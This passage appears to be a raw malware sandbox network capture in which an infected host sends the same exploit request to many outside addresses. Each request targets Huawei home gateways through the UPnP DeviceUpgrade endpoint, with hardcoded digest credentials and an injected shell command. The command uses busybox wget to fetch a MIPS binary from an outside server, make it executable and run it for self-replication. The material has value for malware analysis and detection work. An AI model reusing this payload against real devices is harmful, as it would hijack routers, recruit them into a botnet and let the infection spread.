69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  602192.168.2.133410441.247.5.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330154896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  603192.168.2.13455988.223.115.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330185890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  604192.168.2.1359272197.90.106.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330310106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  605192.168.2.1353060157.119.97.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330522060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  606192.168.2.135378041.39.153.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330543041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  607192.168.2.1349922157.71.209.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330575943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  608192.168.2.1339192157.136.222.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330615044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  609192.168.2.1347038197.191.115.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330631018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  610192.168.2.135569413.13.211.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.330655098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  611192.168.2.1347046167.205.255.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.331037045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  612192.168.2.134769041.243.127.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.331053972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
